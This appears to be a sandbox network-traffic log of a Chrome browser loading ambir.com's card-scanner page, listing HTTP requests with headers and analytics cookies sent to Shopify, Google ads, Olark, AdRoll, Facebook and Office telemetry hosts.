      Source: global trafficHTTP traffic detected: GET /buy-button/latest/buy-button-storefront.min.js HTTP/1.1Host: sdks.shopifycdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /apps/app/dist/js/app.js HTTP/1.1Host: acsbapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/08/slide2-1024x603.jpg HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /jsclient/app.js HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1070729751/?random=1732134501018&cv=11&fst=1732134501018&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
      Source: global trafficHTTP traffic detected: GET /jsclient/loader.js HTTP/1.1Host: static.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-ee83140b.min.css HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1070729751/?random=1732134501018&cv=11&fst=1732132800000&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d1SlNRPFvX_ESY-YlKzOQAPb8Frqnwu7evj9JK9Nc3KMSflbX&random=1339105251&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /consent/check/GXXT3DJJNNBKHGBC62RAND?flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&_s=a60e6a62d132d36d1465029b174eaecd&_b=2 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /td/rul/1070729751?random=1732134510409&cv=11&fst=1732134510409&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /a/assets/v0/site/7486-534-10-2045.js?cb=2024-11-20 HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jsclient/app.js HTTP/1.1Host: static.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1070729751/?random=1732134501018&cv=11&fst=1732132800000&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d1SlNRPFvX_ESY-YlKzOQAPb8Frqnwu7evj9JK9Nc3KMSflbX&random=1339105251&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1070729751/?random=1732134510409&cv=11&fst=1732134510409&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
      Source: global trafficHTTP traffic detected: GET /cart.json HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134510.50.0.1978750408; _ga_4J1BFCRRT4=GS1.1.1732134510.1.0.1732134510.0.0.0; __adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472
      Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ambir.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /nrpc/c?c=create&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&g=ALL&q=precache038757109200029083&j=o0&version=loader-precache&xhttp=1&u=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&r=&ca=false&ru=false&ae= HTTP/1.1Host: knrpc.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ambir.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
